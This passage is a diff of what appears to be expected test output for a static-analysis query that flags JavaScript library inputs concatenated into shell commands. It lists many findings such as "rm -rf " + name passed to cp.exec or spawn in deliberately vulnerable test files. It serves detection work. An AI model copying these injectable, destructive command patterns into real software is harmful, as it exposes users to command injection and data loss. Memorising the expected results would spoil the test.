lib/lib.js:120:33:120:36 | name | lib/lib.js:121:22:121:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:120:33:120:36 | name | library input | lib/lib.js:121:2:121:26 | cp.exec ... + name) | shell command | +| lib/lib.js:131:11:131:26 | "rm -rf " + name | lib/lib.js:130:6:130:9 | name | lib/lib.js:131:23:131:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:130:6:130:9 | name | library input | lib/lib.js:131:3:131:27 | cp.exec ... + name) | shell command | +| lib/lib.js:149:12:149:27 | "rm -rf " + name | lib/lib.js:148:37:148:40 | name | lib/lib.js:149:24:149:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:148:37:148:40 | name | library input | lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | shell command | +| lib/lib.js:161:13:161:28 | "rm -rf " + name | lib/lib.js:155:38:155:41 | name | lib/lib.js:161:25:161:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:155:38:155:41 | name | library input | lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | shell command | +| lib/lib.js:173:10:173:23 | "fo \| " + name | lib/lib.js:170:41:170:44 | name | lib/lib.js:173:20:173:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:170:41:170:44 | name | library input | lib/lib.js:173:2:173:24 | cp.exec ... + name) | shell command | +| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | lib/lib.js:177:38:177:41 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | +| lib/lib.js:182:10:182:27 | "rm -rf " + broken | lib/lib.js:177:38:177:41 | name | lib/lib.js:182:22:182:27 | broken | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | +| lib/lib.js:187:10:187:25 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:187:2:187:26 | cp.exec ... + name) | shell command | +| lib/lib.js:190:11:190:26 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:190:23:190:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:190:3:190:27 | cp.exec ... + name) | shell command | +| lib/lib.js:197:10:197:25 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:197:22:197:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:197:2:197:26 | cp.exec ... + name) | shell command | +| lib/lib.js:200:11:200:26 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:200:23:200:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:200:3:200:27 | cp.exec ... + name) | shell command | +| lib/lib.js:207:10:207:25 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:207:22:207:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:207:2:207:26 | cp.exec ... + name) | shell command | +| lib/lib.js:212:11:212:26 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:212:23:212:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:212:3:212:27 | cp.exec ... + name) | shell command | +| lib/lib.js:217:10:217:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:217:22:217:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:217:2:217:26 | cp.exec ... + name) | shell command | +| lib/lib.js:220:11:220:26 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:220:23:220:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:220:3:220:27 | cp.exec ... + name) | shell command | +| lib/lib.js:224:10:224:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:224:22:224:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:224:2:224:26 | cp.exec ... + name) | shell command | +| lib/lib.js:228:10:228:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:228:22:228:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:228:2:228:26 | cp.exec ... + name) | shell command | +| lib/lib.js:236:10:236:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:236:22:236:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:236:2:236:26 | cp.exec ... + name) | shell command | +| lib/lib.js:249:10:249:25 | "rm -rf " + name | lib/lib.js:248:42:248:45 | name | lib/lib.js:249:22:249:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:249:2:249:26 | cp.exec ... + name) | shell command | +| lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | lib/lib.js:248:42:248:45 | name | lib/lib.js:253:22:253:28 | cleaned | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:253:2:253:29 | cp.exec ... leaned) | shell command | +| lib/lib.js:258:10:258:25 | "rm -rf " + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:258:22:258:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:258:2:258:26 | cp.exec ... + name) | shell command | +| lib/lib.js:261:11:261:33 | "rm -rf ... + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:261:30:261:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:261:3:261:34 | cp.exec ... + name) | shell command | +| lib/lib.js:268:10:268:32 | "rm -rf ... version | lib/lib.js:267:46:267:48 | obj | lib/lib.js:268:22:268:32 | obj.version | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:267:46:267:48 | obj | library input | lib/lib.js:268:2:268:33 | cp.exec ... ersion) | shell command | +| lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:277:23:277:30 | opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | shell command | +| lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:281:23:281:35 | this.opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | shell command | +| lib/lib.js:308:11:308:26 | "rm -rf " + name | lib/lib.js:307:39:307:42 | name | lib/lib.js:308:23:308:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:307:39:307:42 | name | library input | lib/lib.js:308:3:308:27 | cp.exec ... + name) | shell command | +| lib/lib.js:315:10:315:25 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:315:22:315:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:315:2:315:26 | cp.exec ... + name) | shell command | +| lib/lib.js:320:11:320:26 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:320:23:320:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:320:3:320:27 | cp.exec ... + name) | shell command | +| lib/lib.js:325:12:325:51 | "MyWind ... " + arg | lib/lib.js:324:40:324:42 | arg | lib/lib.js:325:49:325:51 | arg | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:324:40:324:42 | arg | library input | lib/lib.js:326:2:326:13 | cp.exec(cmd) | shell command | +| lib/lib.js:340:10:340:26 | "rm -rf " + id(n) | lib/lib.js:339:39:339:39 | n | lib/lib.js:340:22:340:26 | id(n) | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:339:39:339:39 | n | library input | lib/lib.js:340:2:340:27 | cp.exec ... id(n)) | shell command | +| lib/lib.js:351:10:351:27 | "rm -rf " + unsafe | lib/lib.js:349:29:349:34 | unsafe | lib/lib.js:351:22:351:27 | unsafe | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:349:29:349:34 | unsafe | library input | lib/lib.js:351:2:351:28 | cp.exec ... unsafe) | shell command | +| lib/lib.js:406:10:406:25 | "rm -rf " + name | lib/lib.js:405:39:405:42 | name | lib/lib.js:406:22:406:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:405:39:405:42 | name | library input | lib/lib.js:406:2:406:26 | cp.exec ... + name) | shell command | +| lib/lib.js:415:10:415:25 | "rm -rf " + name | lib/lib.js:414:40:414:43 | name | lib/lib.js:415:22:415:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:415:2:415:26 | cp.exec ... + name) | shell command | +| lib/lib.js:417:28:417:31 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:417:28:417:31 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:417:2:417:66 | cp.exec ... => {}) | shell command | +| lib/lib.js:418:25:418:28 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:418:25:418:28 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:418:2:418:45 | cp.spaw ... true}) | shell command | +| lib/lib.js:419:32:419:35 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:419:32:419:35 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:419:2:419:52 | cp.exec ... true}) | shell command | +| lib/lib.js:420:29:420:32 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:420:29:420:32 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:420:2:420:49 | cp.spaw ... true}) | shell command | +| lib/lib.js:424:24:424:27 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:424:24:424:27 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:426:11:426:14 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:426:11:426:14 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:427:14:427:16 | arr | lib/lib.js:414:40:414:43 | name | lib/lib.js:427:14:427:16 | arr | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:428:14:428:58 | build(" ... + '-') | lib/lib.js:414:40:414:43 | name | lib/lib.js:428:14:428:58 | build(" ... + '-') | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:436:19:436:22 | last | lib/lib.js:414:40:414:43 | name | lib/lib.js:436:19:436:22 | last | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:442:12:442:27 | "rm -rf " + name | lib/lib.js:441:39:441:42 | name | lib/lib.js:442:24:442:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:441:39:441:42 | name | library input | lib/lib.js:442:2:442:28 | asyncEx ... + name) | shell command | +| lib/lib.js:447:13:447:28 | "rm -rf " + name | lib/lib.js:446:20:446:23 | name | lib/lib.js:447:25:447:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:446:20:446:23 | name | library input | lib/lib.js:447:3:447:29 | asyncEx ... + name) | shell command | +| lib/lib.js:478:27:478:46 | config.installedPath | lib/lib.js:477:39:477:44 | config | lib/lib.js:478:27:478:46 | config.installedPath | This path concatenation which depends on $@ is later used in a $@. | lib/lib.js:477:39:477:44 | config | library input | lib/lib.js:479:12:479:20 | exec(cmd) | shell command | +| lib/lib.js:483:13:483:33 | ' my na ... + name | lib/lib.js:482:40:482:43 | name | lib/lib.js:483:30:483:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:482:40:482:43 | name | library input | lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | shell command | +| lib/lib.js:499:19:499:34 | "rm -rf " + name | lib/lib.js:498:45:498:48 | name | lib/lib.js:499:31:499:34 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:498:45:498:48 | name | library input | lib/lib.js:499:3:499:35 | MyThing ... + name) | shell command | +| lib/lib.js:510:10:510:25 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:510:22:510:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:510:2:510:26 | cp.exec ... + name) | shell command | +| lib/lib.js:513:11:513:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:513:23:513:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:513:3:513:27 | cp.exec ... + name) | shell command | +| lib/lib.js:519:11:519:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:519:23:519:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:519:3:519:27 | cp.exec ... + name) | shell command | +| lib/lib.js:525:11:525:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:525:23:525:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:525:3:525:27 | cp.exec ... + name) | shell command | +| lib/lib.js:531:11:531:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:531:23:531:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:531:3:531:27 | cp.exec ... + name) | shell command | +| lib/lib.js:537:11:537:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:537:23:537:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:537:3:537:27 | cp.exec ... + name) | shell command | +| lib/lib.js:543:11:543:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:543:23:543:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:543:3:543:27 | cp.exec ... + name) | shell command | +| lib/lib.js:545:11:545:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:545:23:545:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:545:3:545:27 | cp.exec ... + name) | shell command | +| lib/lib.js:552:23:552:26 | args | lib/lib.js:550:39:550:42 | name | lib/lib.js:552:23:552:26 | args | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | +| lib/lib.js:555:33:555:36 | name | lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | +| lib/lib.js:560:14:560:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:560:26:560:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:560:9:560:30 | exec("r ... + name) | shell command | +| lib/lib.js:562:14:562:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:562:26:562:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:562:9:562:30 | exec("r ... + name) | shell command | +| lib/lib.js:566:14:566:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:566:26:566:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:566:9:566:30 | exec("r ... + name) | shell command | +| lib/lib.js:573:10:573:25 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:573:22:573:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:573:2:573:26 | cp.exec ... + name) | shell command | +| lib/lib.js:579:13:579:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:579:25:579:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:579:5:579:29 | cp.exec ... + name) | shell command | +| lib/lib.js:590:17:590:32 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:590:29:590:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:590:9:590:33 | cp.exec ... + name) | shell command | +| lib/lib.js:593:13:593:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:593:25:593:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:593:5:593:29 | cp.exec ... + name) | shell command | +| lib/lib.js:609:10:609:25 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:609:22:609:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:609:2:609:26 | cp.exec ... + name) | shell command | +| lib/lib.js:626:17:626:32 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:626:29:626:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:626:9:626:33 | cp.exec ... + name) | shell command | +| lib/lib.js:629:13:629:28 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:629:25:629:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:629:5:629:29 | cp.exec ... + name) | shell command | +| lib/lib.js:633:18:633:68 | "'" + n ... ) + "'" | lib/lib.js:632:38:632:41 | name | lib/lib.js:633:24:633:62 | name.re ... '\\\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | +| lib/lib.js:634:10:634:30 | "rm -rf ... nitized | lib/lib.js:632:38:632:41 | name | lib/lib.js:634:22:634:30 | sanitized | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | +| lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | lib/subLib2/compiled-file.ts:3:26:3:29 | name | lib/subLib2/compiled-file.ts:4:25:4:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/compiled-file.ts:3:26:3:29 | name | library input | lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | shell command | +| lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | lib/subLib2/special-file.js:3:28:3:31 | name | lib/subLib2/special-file.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/special-file.js:3:28:3:31 | name | library input | lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | lib/subLib3/my-file.ts:3:28:3:31 | name | lib/subLib3/my-file.ts:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib3/my-file.ts:3:28:3:31 | name | library input | lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | lib/subLib4/index.js:6:32:6:35 | name | lib/subLib4/subsub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib4/index.js:6:32:6:35 | name | library input | lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | lib/subLib/amdSub.js:3:28:3:31 | name | lib/subLib/amdSub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/amdSub.js:3:28:3:31 | name | library input | lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | lib/subLib/index.js:3:28:3:31 | name | lib/subLib/index.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:3:28:3:31 | name | library input | lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | lib/subLib/index.js:7:32:7:35 | name | lib/subLib/index.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:7:32:7:35 | name | library input | lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | shell command | +| lib/subLib/index.js:14:22:14:24 | arr | lib/subLib/index.js:13:44:13:46 | arr | lib/subLib/index.js:14:22:14:24 | arr | This shell argument which depends on $@ is later used in a $@. | lib/subLib/index.js:13:44:13:46 | arr | library input | lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | shell command | edges | lib/isImported.js:5:49:5:52 | name | lib/isImported.js:6:22:6:25 | name | provenance | | | lib/lib2.js:3:28:3:31 | name | lib/lib2.js:4:22:4:25 | name | provenance | | | lib/lib2.js:7:32:7:35 | name | lib/lib2.js:8:22:8:25 | name | provenance | | -| lib/lib.js:3:28:3:31 | name | lib/lib.js:4:22:4:25 | name | provenance | | +| lib/lib.js:3:33:3:36 | name | lib/lib.js:4:22:4:25 | name | provenance | | | lib/lib.js:10:32:10:35 | name | lib/lib.js:11:22:11:25 | name | provenance | | | lib/lib.js:14:36:14:39 | name | lib/lib.js:15:22:15:25 | name | provenance | | | lib/lib.js:19:34:19:37 | name | lib/lib.js:20:22:20:25 | name | provenance | | @@ -100,7 +207,7 @@ edges | lib/lib.js:436:19:436:22 | last | lib/lib.js:436:10:436:12 | [post update] arr [ArrayElement] | provenance | | | lib/lib.js:441:39:441:42 | name | lib/lib.js:442:24:442:27 | name | provenance | | | lib/lib.js:446:20:446:23 | name | lib/lib.js:447:25:447:28 | name | provenance | | -| lib/lib.js:477:33:477:38 | config | lib/lib.js:478:27:478:32 | config | provenance | | +| lib/lib.js:477:39:477:44 | config | lib/lib.js:478:27:478:32 | config | provenance | | | lib/lib.js:478:27:478:32 | config | lib/lib.js:478:27:478:46 | config.installedPath | provenance | | | lib/lib.js:482:40:482:43 | name | lib/lib.js:483:30:483:33 | name | provenance | | | lib/lib.js:498:45:498:48 | name | lib/lib.js:499:31:499:34 | name | provenance | | @@ -149,7 +256,7 @@ nodes | lib/lib2.js:4:22:4:25 | name | semmle.label | name | | lib/lib2.js:7:32:7:35 | name | semmle.label | name | | lib/lib2.js:8:22:8:25 | name | semmle.label | name | -| lib/lib.js:3:28:3:31 | name | semmle.label | name | +| lib/lib.js:3:33:3:36 | name | semmle.label | name | | lib/lib.js:4:22:4:25 | name | semmle.label | name | | lib/lib.js:10:32:10:35 | name | semmle.label | name | | lib/lib.js:11:22:11:25 | name | semmle.label | name | @@ -285,7 +392,7 @@ nodes | lib/lib.js:442:24:442:27 | name | semmle.label | name | | lib/lib.js:446:20:446:23 | name | semmle.label | name | | lib/lib.js:447:25:447:28 | name | semmle.label | name | -| lib/lib.js:477:33:477:38 | config | semmle.label | config | +| lib/lib.js:477:39:477:44 | config | semmle.label | config | | lib/lib.js:478:27:478:32 | config | semmle.label | config | | lib/lib.js:478:27:478:46 | config.installedPath | semmle.label | config.installedPath | | lib/lib.js:482:40:482:43 | name | semmle.label | name | @@ -348,110 +455,3 @@ subpaths | lib/lib.js:251:27:251:30 | name | lib/lib.js:239:28:239:28 | s | lib/lib.js:245:9:245:9 | s | lib/lib.js:251:16:251:31 | cleanInput(name) | | lib/lib.js:340:25:340:25 | n | lib/lib.js:329:13:329:13 | x | lib/lib.js:330:9:330:9 | x | lib/lib.js:340:22:340:26 | id(n) | | lib/lib.js:428:28:428:57 | (name ? ... ) + '-' | lib/lib.js:431:23:431:26 | last | lib/lib.js:437:9:437:11 | arr [ArrayElement] | lib/lib.js:428:14:428:58 | build(" ... + '-') | -#select -| lib/isImported.js:6:10:6:25 | "rm -rf " + name | lib/isImported.js:5:49:5:52 | name | lib/isImported.js:6:22:6:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/isImported.js:5:49:5:52 | name | library input | lib/isImported.js:6:2:6:26 | cp.exec ... + name) | shell command | -| lib/lib2.js:4:10:4:25 | "rm -rf " + name | lib/lib2.js:3:28:3:31 | name | lib/lib2.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:3:28:3:31 | name | library input | lib/lib2.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/lib2.js:8:10:8:25 | "rm -rf " + name | lib/lib2.js:7:32:7:35 | name | lib/lib2.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:7:32:7:35 | name | library input | lib/lib2.js:8:2:8:26 | cp.exec ... + name) | shell command | -| lib/lib.js:4:10:4:25 | "rm -rf " + name | lib/lib.js:3:28:3:31 | name | lib/lib.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:3:28:3:31 | name | library input | lib/lib.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/lib.js:11:10:11:25 | "rm -rf " + name | lib/lib.js:10:32:10:35 | name | lib/lib.js:11:22:11:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:10:32:10:35 | name | library input | lib/lib.js:11:2:11:26 | cp.exec ... + name) | shell command | -| lib/lib.js:15:10:15:25 | "rm -rf " + name | lib/lib.js:14:36:14:39 | name | lib/lib.js:15:22:15:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:14:36:14:39 | name | library input | lib/lib.js:15:2:15:26 | cp.exec ... + name) | shell command | -| lib/lib.js:20:10:20:25 | "rm -rf " + name | lib/lib.js:19:34:19:37 | name | lib/lib.js:20:22:20:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:19:34:19:37 | name | library input | lib/lib.js:20:2:20:26 | cp.exec ... + name) | shell command | -| lib/lib.js:27:10:27:25 | "rm -rf " + name | lib/lib.js:26:35:26:38 | name | lib/lib.js:27:22:27:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:26:35:26:38 | name | library input | lib/lib.js:27:2:27:26 | cp.exec ... + name) | shell command | -| lib/lib.js:35:11:35:26 | "rm -rf " + name | lib/lib.js:34:14:34:17 | name | lib/lib.js:35:23:35:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:34:14:34:17 | name | library input | lib/lib.js:35:3:35:27 | cp.exec ... + name) | shell command | -| lib/lib.js:38:11:38:26 | "rm -rf " + name | lib/lib.js:37:13:37:16 | name | lib/lib.js:38:23:38:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:37:13:37:16 | name | library input | lib/lib.js:38:3:38:27 | cp.exec ... + name) | shell command | -| lib/lib.js:41:11:41:26 | "rm -rf " + name | lib/lib.js:40:6:40:9 | name | lib/lib.js:41:23:41:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:40:6:40:9 | name | library input | lib/lib.js:41:3:41:27 | cp.exec ... + name) | shell command | -| lib/lib.js:50:35:50:50 | "rm -rf " + name | lib/lib.js:49:31:49:34 | name | lib/lib.js:50:47:50:50 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:49:31:49:34 | name | library input | lib/lib.js:50:2:50:51 | require ... + name) | shell command | -| lib/lib.js:54:13:54:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:54:25:54:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:55:2:55:14 | cp.exec(cmd1) | shell command | -| lib/lib.js:57:13:57:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:57:25:57:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:59:3:59:14 | cp.exec(cmd) | shell command | -| lib/lib.js:65:10:65:25 | "rm -rf " + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:65:2:65:26 | cp.exec ... + name) | shell command | -| lib/lib.js:69:10:69:47 | "for fo ... la end" | lib/lib.js:64:41:64:44 